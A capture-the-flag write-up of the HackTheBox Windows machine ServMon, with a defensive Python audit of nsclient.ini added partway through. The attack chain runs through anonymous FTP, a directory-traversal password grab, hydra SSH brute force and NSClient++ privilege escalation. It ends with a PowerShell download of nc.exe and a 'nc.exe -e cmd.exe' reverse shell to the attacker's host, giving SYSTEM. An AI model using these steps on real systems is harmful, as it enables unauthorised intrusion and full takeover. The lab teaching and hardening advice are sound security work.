ServMon is one of the machines currently available on the HackTheBox hacking platform and is rated easy.
In this case it is a machine based on the Windows operating system.
Port scanning
As usual, we add the IP of the ServMon machine, 10.10.10.184, to /etc/hosts as servmon.htb and start with the nmap port scan.
# Nmap 7.80 scan initiated Mon May 11 00:14:39 2020 as: nmap -sV -Pn -p- -sC -oA servmon-nmap2 10.10.10.184
Nmap scan report for 10.10.10.184
Host is up (0.080s latency).
Not shown: 65517 closed ports
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst:
|_  SYST: Windows_NT
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp    open  http
| fingerprint-strings:
|   GetRequest, HTTPOptions, RTSPRequest:
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo:
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   X11Probe:
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
|_http-title: Site doesn't have a title (text/html).
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
5666/tcp  open  tcpwrapped
6063/tcp  open  tcpwrapped
6699/tcp  open  napster?
8443/tcp  open  ssl/https-alt
| fingerprint-strings:
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest:
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     workers
|_    jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3m32s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-05-10T22:38:03
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 11 00:34:56 2020 -- 1 IP address (1 host up) scanned in 1217.30 seconds
We discover several open services, which we check one by one below.
Enumeration
We check the first of the services and verify that anonymous FTP access is allowed.
$ ftp 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:asdf): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:05PM       <DIR>          Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection.
01-18-20  12:06PM       <DIR>          Nadine
01-18-20  12:08PM       <DIR>          Nathan
226 Transfer complete.
ftp> ls Nadine
200 PORT command successful.
150 Opening ASCII mode data connection.
01-18-20  12:08PM                  174 Confidential.txt
226 Transfer complete.
ftp> ls Nathan
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:10PM                  186 Notes to do.txt
226 Transfer complete.
ftp>
And we discover two users, Nadine and Nathan, and two files.
The file Confidential.txt:
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards
And the file Notes to do.txt:
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
We have two usernames but no credentials, so we keep investigating.
Next we check port 80, which takes us to a portal running the NVMS-1000 software.
We try the usual, admin:admin, without success, so we search Google for an exploit and find a Directory Traversal vulnerability.
We open Burp Suite, intercept the request and check whether the target is vulnerable:
OK, we have confirmed that it is vulnerable to this flaw, so, using the hint from Confidential.txt, we try to retrieve the passwords file:
And we obtain the file Passwords.txt from Nathan's home directory, with the following contents:
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
With the passwords obtained, we try to log in over SSH with the two users and the list of passwords. We use hydra to run a dictionary attack:
$ hydra -L users.txt -P passwords.txt 10.10.10.184 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-11 11:07:02
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 16 login tries (l:2/p:8), ~1 try per task
[DATA] attacking ssh://10.10.10.184:22/
[22][ssh] host: 10.10.10.184   login: Nadine   password: L1k3B1gBut7s@W0rk
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-11 11:07:05
And we have SSH access with the user Nadine and the password L1k3B1gBut7s@W0rk.
Getting the user flag
We log in over SSH with the credentials obtained, and the user flag is in the user's Desktop folder:
ssh Nadine@10.10.10.184
Nadine@10.10.10.184's password:
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>whoami
servmon\nadine

nadine@SERVMON C:\Users\Nadine>cd Desktop

nadine@SERVMON C:\Users\Nadine\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Nadine\Desktop

08/04/2020  22:28    <DIR>          .
08/04/2020  22:28    <DIR>          ..
11/05/2020  09:43                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)  27,860,647,936 bytes free

nadine@SERVMON C:\Users\Nadine\Desktop>
Privilege escalation
Once we have the initial foothold, after some looking around, we come back to the service on port 8443.
It is NSClient++, an agent used on Windows to monitor the system with Nagios.
We search Google and find an exploit for it, whose explanation we can follow to check whether we can obtain any useful information.
So we look at the file c:\program files\nsclient++\nsclient.ini, whose contents are as follows:
# If you want to fill this file with all available options run the following command:
#   nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
#   nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help


; in flight - TODO
[/settings/default]

; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1


; in flight - TODO
[/settings/NRPE/server]

; Undocumented key
ssl options = no-sslv2,no-sslv3

; Undocumented key
verify mode = peer-cert

; Undocumented key
insecure = false


; in flight - TODO
[/modules]

; Undocumented key
CheckHelpers = disabled

; Undocumented key
CheckEventLog = disabled

; Undocumented key
CheckNSCP = disabled

; Undocumented key
CheckDisk = disabled

; Undocumented key
CheckSystem = disabled

; Undocumented key
WEBServer = enabled

; Undocumented key
NRPEServer = enabled

; CheckTaskSched - Check status of your scheduled jobs.
CheckTaskSched = enabled

; Scheduler - Use this to schedule check commands and jobs in conjunction with for instance passive monitoring through NSCA
Scheduler = enabled

; CheckExternalScripts - Module used to execute external scripts
CheckExternalScripts = enabled


; Script wrappings - A list of templates for defining script commands. Enter any command line here and they will be expanded by scripts placed under the wrapped scripts section. %SCRIPT% will be replaced by the actual script an %ARGS% will be replaced by any given arguments.
[/settings/external scripts/wrappings]

; Batch file - Command used for executing wrapped batch files
bat = scripts\\%SCRIPT% %ARGS%

; Visual basic script - Command line used for wrapped vbs scripts
vbs = cscript.exe //T:30 //NoLogo scripts\\lib\\wrapper.vbs %SCRIPT% %ARGS%

; POWERSHELL WRAPPING - Command line used for executing wrapped ps1 (powershell) scripts
ps1 = cmd /c echo If (-Not (Test-Path "scripts\%SCRIPT%") ) { Write-Host "UNKNOWN: Script `"%SCRIPT%`" not found." ; exit(3) }; scripts\%SCRIPT% $ARGS$; exit($lastexitcode) | powershell.exe /noprofile -command -


; External scripts - A list of scripts available to run from the CheckExternalScripts module. Syntax is: `command=script arguments`
[/settings/external scripts/scripts]


; Schedules - Section for the Scheduler module.
[/settings/scheduler/schedules]

; Undocumented key
foobar = command = foobar


; External script settings - General settings for the external scripts module (CheckExternalScripts).
[/settings/external scripts]
allow arguments = true
And we see two important things in it: the password and the address that is allowed to connect:
; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1
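As an added defensive example that is not part of the original writeup: a small Python audit of the nsclient.ini settings above (the sample is a constructed excerpt reduced to the keys the audit reads) that flags the plaintext API password, the loopback-only "allowed hosts" that does not protect against local users, the CheckExternalScripts + "allow arguments = true" + Scheduler combination, and any external script pointing outside the scripts directory.

```python
import configparser

# Constructed sample: only the nsclient.ini keys the audit reads (the ps1
# wrapper is shortened but keeps its literal %SCRIPT% placeholder).
SAMPLE_INI = r"""
[/settings/default]
password = ew2x6SsGTxjRwXOT
allowed hosts = 127.0.0.1
[/modules]
WEBServer = enabled
Scheduler = enabled
CheckExternalScripts = enabled
[/settings/external scripts/wrappings]
ps1 = cmd /c echo scripts\%SCRIPT% $ARGS$ | powershell.exe /noprofile -command -
[/settings/external scripts/scripts]
[/settings/scheduler/schedules]
foobar = command = foobar
[/settings/external scripts]
allow arguments = true
"""
LOOPBACK = {"127.0.0.1", "localhost", "::1"}

def load_nsclient_ini(text):
    # interpolation=None: values hold literal %SCRIPT%/%ARGS%, which the default
    # interpolation would reject; ';' and '#' both start comment lines.
    cp = configparser.ConfigParser(interpolation=None, comment_prefixes=(";", "#"))
    cp.read_string(text)
    return cp

def audit_nsclient(cp):
    """Flag settings that let an authenticated web-API user run commands as the
    service account (SYSTEM); returns a list of 'SEVERITY: message' strings."""
    get = lambda s, k: cp.get(s, k, fallback="").strip().lower()
    findings = []
    if get("/settings/default", "password"):
        findings.append("MEDIUM: API password stored in plaintext; anyone who can read nsclient.ini can authenticate")
    hosts = {h.strip() for h in get("/settings/default", "allowed hosts").split(",") if h.strip()}
    if get("/modules", "webserver") == "enabled" and hosts and hosts <= LOOPBACK:
        findings.append("INFO: allowed hosts is loopback-only; blocks remote clients but not local users (direct or via SSH port forward)")
    ext = get("/modules", "checkexternalscripts") == "enabled"
    if ext and get("/settings/external scripts", "allow arguments") == "true":
        findings.append("HIGH: CheckExternalScripts with 'allow arguments = true' lets a web user define and run arbitrary commands")
    if ext and get("/modules", "scheduler") == "enabled":
        findings.append("HIGH: Scheduler + external scripts run defined commands on an interval without any client connecting")
    if cp.has_section("/settings/external scripts/scripts"):
        for name, cmd in cp.items("/settings/external scripts/scripts"):
            if ":\\" in cmd:  # absolute Windows path, i.e. outside the scripts\ directory
                findings.append(f"HIGH: external script '{name}' runs a file outside the scripts directory: {cmd.strip()}")
    return findings
```

Disabling CheckExternalScripts (or at least setting allow arguments = false and dropping the Scheduler module) clears the HIGH findings; a new entry under [/settings/external scripts/scripts] pointing at an absolute path is the post-compromise artifact to watch for.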
So we create an SSH tunnel in order to reach the portal from the address 127.0.0.1 (localhost):
ssh -L 9000:127.0.0.1:8443 nadine@10.10.10.184
And we get into the portal at https://127.0.0.1:9000 and log in with the password obtained.
Now we upload nc.exe to the machine so we can run a reverse shell and connect as SYSTEM:
powershell invoke-webrequest -Uri http://10.10.x.x:12312/nc.exe -OutFile nc.exe
And we create a .bat file that we will later run on the machine:
@echo off
C:\Temp\nc.exe -e cmd.exe 10.10.x.x 4444
And we upload it as well:
invoke-webrequest -Uri http://10.10.x.x:12312/shell.bat -OutFile shell.bat
Next we go to the Settings section and define our script as shown in the following screenshot:
And then we create a scheduled task that runs our script:
Then we click the Control > Reload button in the top bar.
Getting the root flag
Once it reloads and the one-minute interval we set for the scheduled task has elapsed, we get the shell as SYSTEM:
$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.x.x] from (UNKNOWN) [10.10.10.184] 50249
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami
whoami
nt authority\system

C:\Program Files\NSClient++>cd c:\users\administrator\desktop
cd c:\users\administrator\desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Administrator\Desktop

08/04/2020  23:12    <DIR>          .
08/04/2020  23:12    <DIR>          ..
11/05/2020  11:02                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)  27,823,443,968 bytes free

C:\Users\Administrator\Desktop>
And we have our root flag, completing the machine and earning our points.